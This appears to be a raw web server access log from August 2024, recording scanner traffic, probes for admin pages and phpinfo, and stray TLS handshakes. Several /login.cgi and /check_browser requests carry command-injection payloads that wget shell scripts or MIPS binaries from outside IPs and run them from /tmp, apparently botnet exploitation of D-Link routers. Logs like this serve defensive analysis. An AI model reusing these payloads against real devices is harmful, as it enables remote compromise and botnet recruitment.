46.19.143.26 - - [04/Aug/2024:03:17:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.43 - - [04/Aug/2024:03:18:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [04/Aug/2024:03:19:19 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [04/Aug/2024:03:20:48 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [04/Aug/2024:03:21:07 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [04/Aug/2024:03:21:16 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
104.42.213.46 - - [04/Aug/2024:03:23:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://142.11.210.231/packets.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
46.19.143.26 - - [04/Aug/2024:03:23:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
46.19.143.26 - - [04/Aug/2024:03:24:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
80.82.77.202 - - [04/Aug/2024:03:25:33 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.224.128.43 - - [04/Aug/2024:03:26:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Aug/2024:03:27:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [04/Aug/2024:03:28:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.57 - - [04/Aug/2024:03:30:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
206.168.34.114 - - [04/Aug/2024:03:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.168.34.114 - - [04/Aug/2024:03:31:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.114 - - [04/Aug/2024:03:31:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.114 - - [04/Aug/2024:03:31:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.191.126.213 - - [04/Aug/2024:03:31:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:03:32:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [04/Aug/2024:03:35:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.143.26 - - [04/Aug/2024:03:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
184.105.139.70 - - [04/Aug/2024:03:37:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
184.105.247.196 - - [04/Aug/2024:03:38:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
46.19.143.26 - - [04/Aug/2024:03:39:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.191.126.213 - - [04/Aug/2024:03:39:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [04/Aug/2024:03:40:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
184.105.139.70 - - [04/Aug/2024:03:40:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
184.105.139.70 - - [04/Aug/2024:03:41:18 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
184.105.247.196 - - [04/Aug/2024:03:41:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
184.105.247.196 - - [04/Aug/2024:03:42:01 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
65.49.1.99 - - [04/Aug/2024:03:42:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
94.156.66.116 - - [04/Aug/2024:03:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/67.0.3396.99 Chrome/67.0.3396.99 Safari/537.36"
185.224.128.43 - - [04/Aug/2024:03:44:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.1.95 - - [04/Aug/2024:03:45:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
185.224.128.43 - - [04/Aug/2024:03:45:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.1.105 - - [04/Aug/2024:03:45:35 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
35.203.210.70 - - [04/Aug/2024:03:46:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Aug/2024:03:47:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.53 - - [04/Aug/2024:03:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.53 - - [04/Aug/2024:03:48:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [04/Aug/2024:03:48:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [04/Aug/2024:03:48:47 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
94.156.66.116 - - [04/Aug/2024:03:49:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
185.224.128.43 - - [04/Aug/2024:03:50:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Aug/2024:03:51:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
148.153.56.82 - - [04/Aug/2024:03:54:30 +0200] "GET /pe4S HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:03:54:31 +0200] "GET /ZDqN HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:03:54:31 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:03:54:32 +0200] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:03:54:34 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:03:54:34 +0200] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
185.224.128.43 - - [04/Aug/2024:03:54:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.55 - - [04/Aug/2024:03:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:03:58:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:04:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.137.158 - - [04/Aug/2024:04:03:11 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
46.19.143.26 - - [04/Aug/2024:04:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
194.165.17.13 - - [04/Aug/2024:04:08:34 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
194.165.17.13 - - [04/Aug/2024:04:10:31 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
3.8.137.158 - - [04/Aug/2024:04:11:30 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
37.139.5.66 - - [04/Aug/2024:04:13:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
211.19.66.186 - - [04/Aug/2024:04:13:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
85.98.40.102 - - [04/Aug/2024:04:18:27 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:31 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:32 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:32 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:32 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:33 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:33 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:34 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:34 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
85.98.40.102 - - [04/Aug/2024:04:18:34 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "python-requests/2.27.1"
40.78.61.105 - - [04/Aug/2024:04:19:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
3.8.137.158 - - [04/Aug/2024:04:20:03 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
205.210.31.251 - - [04/Aug/2024:04:20:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.251 - - [04/Aug/2024:04:20:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [04/Aug/2024:04:27:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:04:28:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.137.158 - - [04/Aug/2024:04:28:56 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [04/Aug/2024:04:29:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.238.181.34 - - [04/Aug/2024:04:33:16 +0200] "\x03" 501 316 "-" "-"
104.42.185.14 - - [04/Aug/2024:04:34:22 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
40.112.199.70 - - [04/Aug/2024:04:36:37 +0200] "GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd%20/tmp%20wget%20http://212.192.241.72/lolol.sh%20curl%20-O http://212.192.241.72/lolol.sh%20sh%20/tmp/kh%27$/lolol.sh HTTP/1.1" 404 314 "-" "Dark"
3.8.137.158 - - [04/Aug/2024:04:37:29 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.8.137.158 - - [04/Aug/2024:04:41:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
216.218.206.68 - - [04/Aug/2024:04:44:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
216.218.206.68 - - [04/Aug/2024:04:44:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.20.69 - - [04/Aug/2024:04:45:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.4 - - [04/Aug/2024:04:45:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.61 - - [04/Aug/2024:04:45:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
154.213.186.18 - - [04/Aug/2024:04:47:39 +0200] "\x16\x03\x01\x01\x18\x01" 501 321 "-" "-"
3.8.137.158 - - [04/Aug/2024:04:49:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [04/Aug/2024:04:51:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:04:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.137.158 - - [04/Aug/2024:04:52:39 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
185.191.126.213 - - [04/Aug/2024:04:55:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.137.158 - - [04/Aug/2024:04:56:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [04/Aug/2024:04:56:32 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.191.126.213 - - [04/Aug/2024:05:01:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.137.158 - - [04/Aug/2024:05:03:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.20.159.190 - - [04/Aug/2024:05:05:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.13.227.24/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
35.203.211.96 - - [04/Aug/2024:05:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Aug/2024:05:20:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:05:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:05:30:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
159.203.88.160 - - [04/Aug/2024:05:38:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.203.88.160 - - [04/Aug/2024:05:38:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.203.88.160 - - [04/Aug/2024:05:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:05:38:15 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
159.203.88.160 - - [04/Aug/2024:05:38:16 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.203.88.160 - - [04/Aug/2024:05:38:16 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
159.203.88.160 - - [04/Aug/2024:05:38:16 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:05:38:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:05:38:16 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:05:38:17 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.88.160 - - [04/Aug/2024:05:38:17 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
148.153.45.234 - - [04/Aug/2024:05:42:27 +0200] "GET /Xnd2 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.234 - - [04/Aug/2024:05:42:27 +0200] "GET /WDWk HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.234 - - [04/Aug/2024:05:42:28 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.234 - - [04/Aug/2024:05:42:28 +0200] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.234 - - [04/Aug/2024:05:42:28 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.234 - - [04/Aug/2024:05:42:29 +0200] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
93.174.93.12 - - [04/Aug/2024:05:45:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
93.174.93.12 - - [04/Aug/2024:05:45:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:05:48:43 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1"
148.153.56.82 - - [04/Aug/2024:05:48:52 +0200] "GET /J7qj HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:05:48:52 +0200] "GET /XwHF HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:05:48:53 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:05:48:56 +0200] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:05:48:56 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.82 - - [04/Aug/2024:05:48:57 +0200] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
94.156.68.162 - - [04/Aug/2024:05:50:31 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 8.0.0; LDN-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
94.156.68.162 - - [04/Aug/2024:05:52:44 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3798.0 Safari/537.36"
45.156.129.54 - - [04/Aug/2024:05:52:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:05:53:34 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1"
185.191.126.213 - - [04/Aug/2024:05:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Aug/2024:05:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.68.162 - - [04/Aug/2024:05:59:50 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0"
94.156.68.162 - - [04/Aug/2024:06:05:01 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 8.1.0; en-US; Infinix X624B Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:06:33 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23"
94.156.68.162 - - [04/Aug/2024:06:07:18 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:07:19 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
94.156.68.162 - - [04/Aug/2024:06:07:36 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:07:55 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13"
94.156.68.162 - - [04/Aug/2024:06:08:26 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/74.0.3729.169 Chrome/74.0.3729.169 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:08:26 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:08:26 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Moto G Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:08:52 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:09:34 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 9; LLD-AL10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
94.156.68.162 - - [04/Aug/2024:06:09:50 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 9; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Mobile Safari/537.36"
45.58.184.139 - - [04/Aug/2024:06:09:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
